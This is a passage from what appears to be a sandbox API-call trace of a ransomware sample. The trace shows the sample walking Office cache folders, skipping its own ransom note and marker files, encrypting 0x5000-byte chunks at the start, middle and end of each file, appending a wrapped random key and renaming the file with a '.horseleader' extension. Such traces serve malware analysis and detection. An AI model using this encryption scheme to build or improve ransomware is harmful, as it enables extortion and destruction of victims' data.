dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0125.411] lstrcmpiW (lpString1="MSOCache", lpString2="Windows") returned -1 [0125.432] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0125.432] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0125.435] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0125.438] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.444] GetProcessHeap () returned 0x780000 [0125.445] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0125.445] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0125.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0125.557] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.558] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0125.559] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.559] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0125.560] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0125.560] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0125.562] lstrlenW (lpString=".testttjffg") returned 11 [0125.576] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\.", lpSrch=".testttjffg") returned 0x0 [0125.576] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0125.576] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0125.576] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\." (normalized: "c:\\msocache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.577] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0125.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.577] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0125.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.577] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0125.577] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0125.577] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0125.577] lstrlenW (lpString=".testttjffg") returned 11 [0125.577] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\..", lpSrch=".testttjffg") returned 0x0 [0125.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0125.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0125.578] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.578] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0125.578] lstrcmpiW (lpString1="All Users", lpString2="Windows") returned -1 [0125.578] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0125.578] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0125.578] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0125.579] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.579] GetProcessHeap () returned 0x780000 [0125.579] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.579] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\*") returned 27 [0125.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0126.795] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0126.796] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\.") returned 27 [0126.796] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0126.796] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0126.796] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0126.796] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0126.796] lstrlenW (lpString=".testttjffg") returned 11 [0126.797] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\.", lpSrch=".testttjffg") returned 0x0 [0126.797] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0126.797] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0126.797] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\." (normalized: "c:\\msocache\\all users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.798] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0127.326] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0127.330] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\..") returned 28 [0127.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0127.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0127.330] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0127.330] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0127.330] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0127.330] lstrlenW (lpString=".testttjffg") returned 11 [0127.330] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\..", lpSrch=".testttjffg") returned 0x0 [0127.330] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0127.331] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0127.331] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\.." (normalized: "c:\\msocache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.331] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0127.331] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0127.331] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned 66 [0127.332] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0127.332] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0127.332] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0127.332] GetProcessHeap () returned 0x780000 [0127.332] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0127.332] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*") returned 68 [0127.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0127.333] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0127.334] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.") returned 68 [0127.334] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0127.334] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0127.334] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0127.334] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0127.334] lstrlenW (lpString=".testttjffg") returned 11 [0127.334] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0127.334] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0127.335] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0127.335] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.335] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0127.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0127.335] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\..") returned 69 [0127.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0127.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0127.336] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0127.336] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0127.336] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0127.336] lstrlenW (lpString=".testttjffg") returned 11 [0127.336] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0127.336] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0127.336] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0127.337] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.337] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0127.337] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Windows") returned -1 [0127.337] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0127.337] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".horseleader") returned 0x0 [0127.337] lstrcmpW (lpString1="ExcelLR.cab", lpString2="#Decrypt#.txt") returned 1 [0127.337] lstrcmpW (lpString1="ExcelLR.cab", lpString2="_uninstalling_.png") returned 1 [0127.338] lstrlenW (lpString=".testttjffg") returned 11 [0127.338] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpSrch=".testttjffg") returned 0x0 [0127.338] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0127.338] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0127.338] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0127.343] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0127.343] StrStrW (lpFirst="ExcelLR.cab", lpSrch=".txt") returned 0x0 [0127.343] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=16972987) returned 1 [0127.343] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.343] ReadFile (in: hFile=0x174, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.068] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.068] WriteFile (in: hFile=0x174, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.069] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x81565d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.069] ReadFile (in: hFile=0x174, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.528] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.528] WriteFile (in: hFile=0x174, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.528] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x102acbb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.529] ReadFile (in: hFile=0x174, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.564] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.564] WriteFile (in: hFile=0x174, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0128.565] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.565] WriteFile (in: hFile=0x174, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0128.565] WriteFile (in: hFile=0x174, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0128.565] CloseHandle (hObject=0x174) returned 1 [0133.197] GetProcessHeap () returned 0x780000 [0133.197] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b49c8 [0133.197] wnsprintfW (in: pszDest=0x7b49c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.horseleader") returned 90 [0133.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.horseleader")) returned 1 [0133.211] GetProcessHeap () returned 0x780000 [0133.211] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b49c8 | out: hHeap=0x780000) returned 1 [0133.211] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0133.211] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Windows") returned -1 [0133.212] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0133.212] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".horseleader") returned 0x0 [0133.212] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0133.212] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="_uninstalling_.png") returned 1 [0133.212] lstrlenW (lpString=".testttjffg") returned 11 [0133.212] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpSrch=".testttjffg") returned 0x0 [0133.212] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0133.213] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0133.213] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0133.213] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0133.214] StrStrW (lpFirst="ExcelMUI.msi", lpSrch=".txt") returned 0x0 [0133.214] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2506240) returned 1 [0133.214] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.214] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.219] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.219] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.220] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12f700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.220] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0133.224] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.224] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 